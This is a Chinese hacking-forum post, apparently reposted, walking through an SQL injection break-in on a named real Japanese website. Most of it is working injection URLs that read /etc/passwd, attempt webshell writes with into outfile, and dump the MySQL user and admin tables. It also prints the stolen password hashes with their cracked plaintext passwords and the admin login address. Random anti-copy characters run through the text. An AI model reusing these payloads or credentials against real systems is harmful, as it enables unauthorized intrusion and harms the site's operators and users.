|
|
, T5 |- [3 I. ^; J/ D- `' B+ G- n( M3 Q" ~: O; \
0x01. 检测 www.zuaa.jp 收集数据
% C; Z" y A6 O- T q) E. S
/ d8 `! t+ Y' ?8 |5 S8 h8 q3 a; }+ J$ h9 g" {
whatweb6 D# w( n" ? B+ J2 d) v: l
4 _; L% ~/ D/ ^2 M9 J9 z3 W* L5 n$ f8 ^3 E
利用NMAP扫描! d) c. Z: y1 x1 q1 e0 U
) w8 O! X- x) G, h中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持5 O: h: _- H7 d) \4 R$ x! S0 D
0x02.找注入点
! E% x ^' v- d找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3901 Z g) o8 h8 \) G/ ^' c
: _& f4 N, i, [0 J3 P
- g! G: W. F& o1 Y3 m8 v0x03.order by
* l- u& C: ?! W# v* \ http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
( N1 r; r0 w) O9 O' r9 C2 P! v
/ y6 T4 s: x. i, H! d/ R4 Torder by 28报错,order by 27正常( N+ D$ d3 K4 Q6 [* E: A+ V5 s
8 C7 p& a, [( ]6 E3 h. l7 Y0x04. union手动查询
8 _: w& M" z& w0 ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ i: D' J C0 l F3 R
添加到 27 时正常显示 ! \7 z& y8 t# B& F p* L
' ]) g- Y+ M& B中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
3 B( W' E, _8 a! z5 u- E5 _" L- @9 O3 a( R* }
0x05. info:
' E) p! E& O6 I. e# v1 Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 7 ~2 I! w4 y3 f# f
; ^# @6 e3 u3 j4 Y8 n) s$ [( Ruser: root@localhost+ ^8 B# V/ r) \. j* \2 p4 I
database: openpne
* B1 s+ d& \5 N/ t. pversion: 4.1.224 z2 _1 U( _* ]
os: portbld-freebsd5.4) z. X2 W+ r5 P, j4 J+ F
, C( e+ Y5 n; [
0x06. root用户1 m3 \ B( U! ^+ T' L
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
1 x v2 s' k" u" F3 s- }' y4 I! `% {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, p( b5 R; N5 L1 }: d3 c7 s/ Y3 u8 ?" H. Y4 [8 m; v% S
通过工具转换& S9 C' v: \* P# O8 W
, g8 s# n- b r$ v7 _( A% [6 J
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
) w' X# t+ d. T9 w
3 V8 b8 w# q# ?- ` K0x07. 利用 into outfile
" q6 [7 I, X, m3 C$ _3 i3 z- R全部都失败( }& s. f' e4 f( M! M9 N5 O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
0 {' ?- o0 C2 [4 o. D3 `, O3 t7 W: S% o ^: s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
2 [1 m [7 t- B4 |9 O
. V/ x5 s5 ^) y6 r! _0 D页面显示“MDB2 Error:syntax error”
4 S9 O' S! F' U- B
! V4 v. X! K) i, T0 o0x08. 利用 mysql 4.1
6 q Q& U/ M( F猜常规表名,字段未果 工具 sqlmap) L: {" q- r% Z+ W+ k+ `
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持( L( {3 R1 H8 D
. ]- l9 K" w8 V2 {8 c8 S6 k6 H4 `
- [% P6 }. K3 S1 X
2 I) w x" ?; a9 o) Y0 d1 o* j9 N
0x09. 查找后台
; K, |1 `; R0 l/ h# F利用 现有的各种 后台工具尝试都不行* N' ~6 Y' U6 r2 X4 J
/ l5 s0 j% `8 Q0x10. MySL外联方法
7 @5 p2 c# @& a; E8 x6 R) ?从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
# {( k! X! D t) Q8 ?+ ?2 ]# f) T可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user9 G8 k0 P2 h. ~4 [& [/ k
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
. w1 j5 X- I" i5 i* d/ k
0 @' I- u- d) R" L* }' C这个可以在 www.cmd5.com 解密
$ g* [/ a5 ^+ c {, _3 x) vroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
9 n/ V/ s1 u$ N- ochen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
7 J8 a P- G; u6 [7 l! Jopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???3 p& y: Q; v, b8 p! k3 B$ s) q, }
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
4 f% c! V* C% E; K工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知+ \& `* ]4 P4 t
" I( u `+ u' G% R* Q
- a( W% _5 ]1 X u, ]( A/ I0x11. 网站突破& @% G4 e( S v! K
发现网站的源程序 openpne, google 下载 openpne 源码
) ?" }. H6 z" J, F3 [ e+ _
- H" @6 I8 D. |$ [) |8 C' i X& o
5 K( E$ R, w! D. [0 f0x12. 默认信息利用8 g. j3 Z& Y. t1 W4 f
http://sns.zuaa.jp/?m=admin&a=page_login: T8 k# ?) V, `$ ~
+ W9 F$ e0 }+ D! l, w: p+ M7 w+ f! @% {
表名 (c_admin_user) ,字段名(username,password)
) C+ e, V$ x1 C/ C, Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
: n( Z6 V# z, M7 }! G
" b3 |# ^5 M o! x解密
) F6 q. u5 E- G6 Rzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
. `' X& T% p* n6 Z. H1 uzuaajp:c0923ec5857796a393da99905008c176, zju1897
+ a! z8 H( _; l" A* A* f9 l
" R3 U4 Y( S/ t$ ~* j; [1 X中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
: M6 o& |8 p; `* U2 y# l2 N4 K- r6 z: j
0x13. 登录后台7 e0 `7 q! J! o$ G5 M
3 g1 w! t8 P1 q* O) k
1 ^( r4 q% f% M% V2 m, L
5 W4 v; A" O( ?; G* y7 U
0x14. 小结+ R+ [7 A3 |+ O# q: I8 e' e
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# W6 ?% |! W) h3 c0 y: E感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点1 ^' @( S/ e1 o
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain4 c& s6 D; ^ t% ?+ l
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
" o! V- v! _1 ?) V2 v- }
6 }4 s! {8 e* k4 Q6 W* _最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!3 Y1 j" ~7 _4 \4 N$ n
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|